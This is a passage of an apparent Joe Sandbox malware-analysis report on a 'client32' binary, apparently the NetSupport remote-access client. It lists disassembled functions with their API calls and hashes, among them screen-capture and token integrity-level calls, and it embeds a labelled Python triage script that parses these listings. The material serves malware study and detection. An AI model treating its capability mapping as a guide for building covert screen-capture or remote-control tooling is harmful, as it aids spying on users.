                                                                                  • API ID: BlockingCallCancelSleep
                                                                                  • String ID:
                                                                                  • API String ID: 3706969569-0
                                                                                  • Opcode ID: 124b45a39b9c3c69db165657b258e44cd1f9e7057d74df559a397c66610fba36
                                                                                  • Instruction ID: 08e29cbc6c890af0e8801b20fe8a7b6474464d8c815e1d13b57c3fc82b3cc787
                                                                                  • Opcode Fuzzy Hash: 124b45a39b9c3c69db165657b258e44cd1f9e7057d74df559a397c66610fba36
                                                                                  • Instruction Fuzzy Hash: 96B012703933114BEF0013710E0636A20CC0FE725FF5584603A41C84CAFFA0C102E221
                                                                                  APIs
                                                                                    • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                    • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                  • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                  • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                  • String ID:
                                                                                  • API String ID: 3768737497-0
                                                                                  • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                  • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                                  • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                  • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LockitLockit::_std::_
                                                                                  • String ID:
                                                                                  • API String ID: 3382485803-0
                                                                                  • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                  • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                                  • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                  • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                                  APIs
                                                                                  • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76938400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                  • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                  • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                  • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  • Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                  • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                                  • Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                  • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                    • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 328603210-0
                                                                                  • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                  • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                                  • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                  • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,6FA16F16,00000000,?,6FA1D40B,00000001,6FA16F16,00000000,00000000,00000000,?,6FA16F16,00000001,00000214), ref: 6FA1A0C5
                                                                                    • Part of subcall function 6FA160F9: __getptd_noexit.LIBCMT ref: 6FA160F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 328603210-0
                                                                                  • Opcode ID: af46957bd6e6b353395cff199f2e2eb1abc6124c0e286c06a48c03490f74b7cc
                                                                                  • Instruction ID: d43dad5aadf0e8c85418d3618b4ce96c008a55c5fe0db758de6f7ec12a4768b1
                                                                                  • Opcode Fuzzy Hash: af46957bd6e6b353395cff199f2e2eb1abc6124c0e286c06a48c03490f74b7cc
                                                                                  • Instruction Fuzzy Hash: 9B01B1363093169FFB25CE35CD14B973756AF82364F1A852AEC15CF280DB7DA494C640
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __waccess_s
                                                                                  • String ID:
                                                                                  • API String ID: 4272103461-0
                                                                                  • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                  • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                  • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                  • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __fsopen
                                                                                  • String ID:
                                                                                  • API String ID: 3646066109-0
                                                                                  • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                  • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                  • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                  • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                  APIs
                                                                                  • _NSMClient32@8.PCICL32(?,?,?,003A10A2,00000000), ref: 003A100B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3445791821.00000000003A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 003A0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3445765372.00000000003A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_3a0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Client32@8
                                                                                  • String ID:
                                                                                  • API String ID: 433899448-0
                                                                                  • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                  • Instruction ID: 41843f1f7e6c0762239a0be45f5ed4243b55062c1223f2cde1b52779c505cc43
                                                                                  • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                  • Instruction Fuzzy Hash: 2DB092B211434D9B8714EE98E841C7B339CAA98600F040809BD0547282CA61FC609671
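The "APIs" lists in these entries are what a triager actually reads: each function's direct imports, in call order, plus the calls its subcalls make. The script below is an added example, not part of the Joe Sandbox report and not NetSupport code; it parses those lines into a per-function API sequence (keeping the "Part of subcall function" calls apart from direct calls) and applies two triage heuristics: a process-integrity query via GetTokenInformation with the TokenIntegrityLevel class, and the GetDC / CreateCompatibleDC / CreateCompatibleBitmap / BitBlt screen-capture sequence visible in the client32 function at 110077EA. The sample input is constructed from lines copied out of this section; the heuristic names, the choice of those four GDI calls as the capture signature, and the `parse_listing`/`classify` helper names are assumptions of the example.

```python
"""Parse the per-function 'APIs' lists of a Joe Sandbox disassembly listing.

Added example: not Joe Sandbox tooling. The regex follows the line shape used
in the report, e.g.
  GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
  Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
The capability heuristics below are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+): )?"
    r"(?P<api>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Assumed heuristic: all four of these as *direct* calls in one function.
SCREEN_CAPTURE = {"GetDC", "CreateCompatibleDC", "CreateCompatibleBitmap", "BitBlt"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                       # address of the call site in the dump
    via_subcall: Optional[str]     # subcall function address, None if direct


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)

    def direct(self) -> List[ApiCall]:
        return [c for c in self.calls if c.via_subcall is None]


def split_args(raw: str) -> List[str]:
    """Split on top-level commas only, so '00000001(TokenIntegrityLevel)' stays whole."""
    out, cur, depth = [], "", 0
    for ch in raw:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            out.append(cur)
            cur = ""
        else:
            cur += ch
    if raw:
        out.append(cur)
    return out


def parse_listing(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'APIs' header; the list ends at the next section header."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if line in ("Memory Dump Source", "Strings"):
            current = None
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:  # lines that do not look like a call (none expected) are skipped
            current.calls.append(ApiCall(m["api"], m["module"],
                                         split_args(m["args"] or ""),
                                         m["ref"], m["subfn"]))
    return entries


def api_sequence(entry: FunctionEntry, include_subcalls: bool = False) -> List[str]:
    """'MODULE!Api' names in call order; the direct sequence is the usual fingerprint."""
    calls = entry.calls if include_subcalls else entry.direct()
    return [f"{c.module}!{c.api}" for c in calls]


def classify(entry: FunctionEntry) -> List[str]:
    tags = []
    if any(c.api == "GetTokenInformation" and any("TokenIntegrityLevel" in a for a in c.args)
           for c in entry.calls):
        tags.append("integrity-level-check")
    if SCREEN_CAPTURE <= {c.api for c in entry.direct()}:
        tags.append("screen-capture")
    return tags


# Constructed sample: lines copied from four entries of this report section.
SAMPLE = """APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
APIs
• RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
Memory Dump Source
APIs
Memory Dump Source
APIs
  • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
• LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
• GetDC.USER32(?), ref: 1100781D
• CreateCompatibleDC.GDI32(00000000), ref: 1100782A
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
• BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
• _memset.LIBCMT ref: 11007BC7
Strings
"""

if __name__ == "__main__":
    for i, e in enumerate(parse_listing(SAMPLE)):
        print(i, classify(e), api_sequence(e))
```

Run against a full saved listing, the direct `api_sequence` of each function is a cheap key for diffing two samples' client32 builds next to the report's own opcode fuzzy hashes; the subcall calls are kept separately because the report repeats them under every caller, which would otherwise inflate the sequence.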
                                                                                  APIs
                                                                                    • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
                                                                                    • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
                                                                                  • SetCursor.USER32(00000000), ref: 110077F1
                                                                                  • GetDC.USER32(?), ref: 1100781D
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                                  • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                                  • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                    • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                    • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                    • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                                  • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                                  • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                                  • DeleteDC.GDI32(?), ref: 110079FA
                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                                  • ReleaseDC.USER32(?,?), ref: 11007A46
                                                                                  • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                                  • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                                  • GetSysColor.USER32(00000004), ref: 11007B50
                                                                                  • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007B67
                                                                                    • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                    • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                    • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                    • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                    • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                    • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                    • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                    • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                    • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                    • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                    • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                    • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                    • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                    • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                    • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                    • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                    • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                  • _memset.LIBCMT ref: 11007BC7
                                                                                  • _swscanf.LIBCMT ref: 11007C34
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                                  • _memset.LIBCMT ref: 11007C8C
                                                                                  • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                                  • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                                  • GetWindowRect.USER32(?,?), ref: 11007DF6
                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 11007E53
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 11007E70
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                                  • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                  • UpdateWindow.USER32(?), ref: 11007EF2
                                                                                  • SetCursor.USER32(?), ref: 11007EFF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                  • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$@Ls$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 2635354838-3135201127
                                                                                  • Opcode ID: 64f7d75a4fb406181703900f776ac32f7e7884569a6b50840db75735d2bd8f7e
                                                                                  • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                                  • Opcode Fuzzy Hash: 64f7d75a4fb406181703900f776ac32f7e7884569a6b50840db75735d2bd8f7e
                                                                                  • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
